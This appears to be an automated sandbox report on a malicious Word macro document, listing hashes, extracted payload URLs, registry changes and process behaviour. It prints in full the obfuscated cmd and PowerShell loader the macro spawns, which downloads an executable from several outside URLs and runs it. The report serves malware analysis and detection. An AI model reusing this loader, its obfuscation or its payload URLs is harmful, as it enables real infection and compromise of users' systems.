Analysis
-
max time kernel
118s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240419-en -
resource tags
arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system -
submitted
26-05-2024 00:40
Behavioral task
behavioral1
Sample
73c835431f1e6b7fa5df4844177dbb2a_JaffaCakes118.doc
Resource
win7-20240419-en
Behavioral task
behavioral2
Sample
73c835431f1e6b7fa5df4844177dbb2a_JaffaCakes118.doc
Resource
win10v2004-20240508-en
General
-
Target
73c835431f1e6b7fa5df4844177dbb2a_JaffaCakes118.doc
-
Size
201KB
-
MD5
73c835431f1e6b7fa5df4844177dbb2a
-
SHA1
9aa543f6d527fffcec26697d00570b77c9589e45
-
SHA256
fba9ba4112dacc745d951a00f20c1e967bf78cbb318e947d695f08c42fb588c2
-
SHA512
accb6a4505ee7c224c9c8245d0afbef846fbf718d00725e506f988a921d1b8a5e8c363a141694f8d22244b982e4fe5d93d96f98620584e4fbac353e4cdc7b69b
-
SSDEEP
3072:f6W0a6xqvY3aODnPofS1eNVvv5ui9tMaRbe8OxM6Yy8DdAlzVH:gaGaODPgS1cvv5ntXwrGhW7H
Malware Config
Extracted
http://www.wingateave.com.au/jhBB/
http://www.moviemeetsmedia.de/pgVW4vy/
http://www.lucropc.com/OM0KDO/
http://www.motoclubfojeteiros.com/wp-content/aeHwbX/
http://www.willardwiganmbe.com/mOAp08/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process 2760 2264 cmd.exe WINWORD.EXE -
Blocklisted process makes network request 12 IoCs
Processes:
powershell.exeflow pid process 5 2764 powershell.exe 6 2764 powershell.exe 8 2764 powershell.exe 10 2764 powershell.exe 11 2764 powershell.exe 13 2764 powershell.exe 14 2764 powershell.exe 15 2764 powershell.exe 17 2764 powershell.exe 19 2764 powershell.exe 20 2764 powershell.exe 21 2764 powershell.exe -
Drops file in Windows directory 1 IoCs
Processes:
WINWORD.EXEdescription ioc process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
Office loads VBA resources, possible macro or embedded object present
-
Processes:
WINWORD.EXEdescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Internet Explorer\Toolbar WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Internet Explorer\MenuExt WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor WINWORD.EXE -
Modifies registry class 64 IoCs
Processes:
WINWORD.EXEdescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon\ = "\"%1\"" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\ShellEx WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\ShellEx WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ = "&Open" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohevi.dll" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\ = "&Edit" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\mhtmlfile WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]" WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\ = "&Open" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 2264 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 2764 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2764 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
WINWORD.EXEpid process 2264 WINWORD.EXE 2264 WINWORD.EXE -
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
WINWORD.EXEcmd.exedescription pid process target process PID 2264 wrote to memory of 2760 2264 WINWORD.EXE cmd.exe PID 2264 wrote to memory of 2760 2264 WINWORD.EXE cmd.exe PID 2264 wrote to memory of 2760 2264 WINWORD.EXE cmd.exe PID 2264 wrote to memory of 2760 2264 WINWORD.EXE cmd.exe PID 2760 wrote to memory of 2764 2760 cmd.exe powershell.exe PID 2760 wrote to memory of 2764 2760 cmd.exe powershell.exe PID 2760 wrote to memory of 2764 2760 cmd.exe powershell.exe PID 2760 wrote to memory of 2764 2760 cmd.exe powershell.exe PID 2264 wrote to memory of 2792 2264 WINWORD.EXE splwow64.exe PID 2264 wrote to memory of 2792 2264 WINWORD.EXE splwow64.exe PID 2264 wrote to memory of 2792 2264 WINWORD.EXE splwow64.exe PID 2264 wrote to memory of 2792 2264 WINWORD.EXE splwow64.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\73c835431f1e6b7fa5df4844177dbb2a_JaffaCakes118.doc"1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2264 -
C:\Windows\SysWOW64\cmd.execmd hiouhOI jido fhoiwehipwmdklqwn whqoijpdwdp & %C^om^S^p^Ec% /V /c set %NkzNwuTcqKjUhrC%=jAfaiVS&&set %tJXhkWiwiahMJ%=o^we^r^s&&set %biVlhbQFkIntwrv%=jiWYtXtbwzhKof&&set %jimhTjPzGjKd%=p&&set %izsRWicImAaFzLu%=wFLnFvwMwZDptok&&set %AoAEflDwjt%=^he^l^l&&set %uGRFanBfVRRbsVw%=oYijwrVWijmmvsT&&!%jimhTjPzGjKd%!!%tJXhkWiwiahMJ%!!%AoAEflDwjt%! " ('((zZB (zZB+zZB(Pd0Do8franPd0+Pd0czZB+zZB = new-Pd0+'+'PdzZB+zZB0oPd0+Pd0bjPdzZB+zZB0+Pd0ect SzZB+zZByst'+'em.Net.WPd0+Pd0ebClientPd0+Pd0;Do8nsPd0+Pd0adasd =P'+'d0+Pd0 Pd0+Pd0nPd0+Pd0ew-object randPd0+Pd0ozZB+zZBm;Pd0+Pd0zZB+zZBDo8bcd Pd0+Pd0= 2eQhttpzZB+zZB://Pd0+Pd0wPd0+Pd0ww.wPd0+Pd0iPd0+P'+'dzZB+zZB0ngat'+'eavePd0+Pd0.comPd0+Pd0.aPd0+Pd0uPd0+Pd0/jhBB/,http:/zZB+zZB/wwPd0+Pd0w.moviemeetsmedia.Pd0+Pd0dPd0+Pd0e/pgPzZB+zZBd0+Pd0'+'VW4'+'vPd0+Pd0y/,Pd0+Pd0ht'+'tpPd0+'+'Pd0://www.Pd0+Pd0lPd0+zZB+zZBPd0ucropcPd0+Pd0.com/OPd0+Pd0MPd'+'0+Pd00Pd0+Pd0KPd0+Pd0DO/Pd0+Pd0,httPzZB+zZBd0+Pd0p://wwwPd0+Pd0.motPd0'+'+Pd0oclubfojeteiPd0+Pd0rPd0+Pd0os.czZB+zZBom/wPd0+Pd0zZB+zZ'+'Bp-czZB+zZBonteP'+'d0+Pd0nt/aeHwbX/,http://wwPd0+Pd0w.wPd0+Pd'+'0iPzZB+zZBd0+Pd0zZB+zZBllarPd0+Pd0dzZB+zZBwiganmb'+'Pd0+Pd0e.com/'+'Pd0'+'+Pd0mOAp08/Pd0+Pd02eQ.SplPd0+Pd0it(2zZB+zZBeQ,2eQ);Pd0+Pd0DzZB+zZBo8karapas = z'+'ZB+zZBDo8nsaPd0zZB+zZB+Pd0dasd.next(zZB+zZB1zZB+zZB,Pd0+Pd0 3432Pd0+'+'Pd04Pd0+Pd05);Pd0+Pd0DPd0+Pd'+'0oPd0+Pd08huas = Do8env'+'Pd0zZB+zZB+P'+'d0:pPzZB+zZBd0+Pd0ublPd0+Pd0icPd0+Pd0 + PdzZB+zZB0+Pd02eQ'+'prt2eQPd0+Pd0 + Do8zZB+zZBkPd0+Pd0azZB+z'+'ZBPd0+Pd0raPd0+Pd0pP'+'dzZB+zZB0+Pd0as + 2eQ.exePd0+Pd0'+'zZB+zZB2Pd0+PdzZB+zZB0eQ;fo'+'reacPd0+Pd0h(Do8abzZB+zZBc Pd0+Pd0in Do8Pd0+Pd0bPd0+Pd0cd){t'+'Pd0+Pd0ry{Do8Pd0zZB+zZB+Pd0fraPd0+PzZB+zZBd0nc.DoPd0+Pd0wnPd0+Pd0loPd0+Pd0ad'+'FiPd0+Pd0lePd0+PdzZB+zZB0(Do8abc.ToStrPd0+Pd0ing(Pd0+Pd0), DPd0+Pd0o8Pd0+'+'Pd0huas);InvoPd0+Pd0ke-ItemPd0+Pd0(Do8huPd0+Pd0as)Pd0'+'+Pd0;break;}Pd0+Pd0catcPd0+Pd0hP'+'d0+Pd0{wrzZB+zZBite-hoPd0+Pd0st Pd0+Pd0DPd0+Pd0o8_.ExcepzZB+zZBtioPd0+Pd0n.MessagePd0+Pd0;Pd0+Pd0}}Pd0) -ReplacePd02eQPd0,[cHAr]39 zZB+zZB -Replace Pd0Do8Pd0,[cHAr]36 -Replace([cH'+'Ar]112+[cHAr]114+[cHAr]116zZB+zZB),['+'cHAr]92) iOb&( s'+'d4pSHomE[21zZB+zZB]+sd4pshomE[34]+Pd0XPd0)zZB)-cREPLAce zZBPd0zZB,[Char]39'+' '+'-cREPLAcezZBiObzZB,[Char]124-repLACE zZBsd4zZB,[Char]36) aTJ. ( FlgsHElLiD[1]+FlgShELlID[13]+zZBXzZB)').RepLACe(([chAr]97+[chAr]84+[chAr]74),[stRING][chAr]124).RepLACe(([chAr]70+[chAr]108+[chAr]103),'$').RepLACe(([chAr]122+[chAr]90+[chAr]66),[stRING][chAr]39)| &( $env:COmsPEC[4,24,25]-join'')2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2760 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell " ('((zZB (zZB+zZB(Pd0Do8franPd0+Pd0czZB+zZB = new-Pd0+'+'PdzZB+zZB0oPd0+Pd0bjPdzZB+zZB0+Pd0ect SzZB+zZByst'+'em.Net.WPd0+Pd0ebClientPd0+Pd0;Do8nsPd0+Pd0adasd =P'+'d0+Pd0 Pd0+Pd0nPd0+Pd0ew-object randPd0+Pd0ozZB+zZBm;Pd0+Pd0zZB+zZBDo8bcd Pd0+Pd0= 2eQhttpzZB+zZB://Pd0+Pd0wPd0+Pd0ww.wPd0+Pd0iPd0+P'+'dzZB+zZB0ngat'+'eavePd0+Pd0.comPd0+Pd0.aPd0+Pd0uPd0+Pd0/jhBB/,http:/zZB+zZB/wwPd0+Pd0w.moviemeetsmedia.Pd0+Pd0dPd0+Pd0e/pgPzZB+zZBd0+Pd0'+'VW4'+'vPd0+Pd0y/,Pd0+Pd0ht'+'tpPd0+'+'Pd0://www.Pd0+Pd0lPd0+zZB+zZBPd0ucropcPd0+Pd0.com/OPd0+Pd0MPd'+'0+Pd00Pd0+Pd0KPd0+Pd0DO/Pd0+Pd0,httPzZB+zZBd0+Pd0p://wwwPd0+Pd0.motPd0'+'+Pd0oclubfojeteiPd0+Pd0rPd0+Pd0os.czZB+zZBom/wPd0+Pd0zZB+zZ'+'Bp-czZB+zZBonteP'+'d0+Pd0nt/aeHwbX/,http://wwPd0+Pd0w.wPd0+Pd'+'0iPzZB+zZBd0+Pd0zZB+zZBllarPd0+Pd0dzZB+zZBwiganmb'+'Pd0+Pd0e.com/'+'Pd0'+'+Pd0mOAp08/Pd0+Pd02eQ.SplPd0+Pd0it(2zZB+zZBeQ,2eQ);Pd0+Pd0DzZB+zZBo8karapas = z'+'ZB+zZBDo8nsaPd0zZB+zZB+Pd0dasd.next(zZB+zZB1zZB+zZB,Pd0+Pd0 3432Pd0+'+'Pd04Pd0+Pd05);Pd0+Pd0DPd0+Pd'+'0oPd0+Pd08huas = Do8env'+'Pd0zZB+zZB+P'+'d0:pPzZB+zZBd0+Pd0ublPd0+Pd0icPd0+Pd0 + PdzZB+zZB0+Pd02eQ'+'prt2eQPd0+Pd0 + Do8zZB+zZBkPd0+Pd0azZB+z'+'ZBPd0+Pd0raPd0+Pd0pP'+'dzZB+zZB0+Pd0as + 2eQ.exePd0+Pd0'+'zZB+zZB2Pd0+PdzZB+zZB0eQ;fo'+'reacPd0+Pd0h(Do8abzZB+zZBc Pd0+Pd0in Do8Pd0+Pd0bPd0+Pd0cd){t'+'Pd0+Pd0ry{Do8Pd0zZB+zZB+Pd0fraPd0+PzZB+zZBd0nc.DoPd0+Pd0wnPd0+Pd0loPd0+Pd0ad'+'FiPd0+Pd0lePd0+PdzZB+zZB0(Do8abc.ToStrPd0+Pd0ing(Pd0+Pd0), DPd0+Pd0o8Pd0+'+'Pd0huas);InvoPd0+Pd0ke-ItemPd0+Pd0(Do8huPd0+Pd0as)Pd0'+'+Pd0;break;}Pd0+Pd0catcPd0+Pd0hP'+'d0+Pd0{wrzZB+zZBite-hoPd0+Pd0st Pd0+Pd0DPd0+Pd0o8_.ExcepzZB+zZBtioPd0+Pd0n.MessagePd0+Pd0;Pd0+Pd0}}Pd0) -ReplacePd02eQPd0,[cHAr]39 zZB+zZB -Replace Pd0Do8Pd0,[cHAr]36 -Replace([cH'+'Ar]112+[cHAr]114+[cHAr]116zZB+zZB),['+'cHAr]92) iOb&( s'+'d4pSHomE[21zZB+zZB]+sd4pshomE[34]+Pd0XPd0)zZB)-cREPLAce zZBPd0zZB,[Char]39'+' '+'-cREPLAcezZBiObzZB,[Char]124-repLACE zZBsd4zZB,[Char]36) aTJ. ( FlgsHElLiD[1]+FlgShELlID[13]+zZBXzZB)').RepLACe(([chAr]97+[chAr]84+[chAr]74),[stRING][chAr]124).RepLACe(([chAr]70+[chAr]108+[chAr]103),'$').RepLACe(([chAr]122+[chAr]90+[chAr]66),[stRING][chAr]39)| &( $env:COmsPEC[4,24,25]-join'')3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2764 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:2792
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
20KB
MD5facb7869d22c468af3f91a9a357ca85c
SHA1f811bd385442b8d3bf9264d393cdcac139d431ed
SHA25662083e261ed2231fae933c6942cf3bb8815e9327765633cb5134984d8f1cf395
SHA5122c0017349fdf7c64ae9043869f1dad04caf76c5e0908f9a49697737b47a89cf092f68d62a4192a82d8506055e711a9784766af235985592d6507d017efc3aa16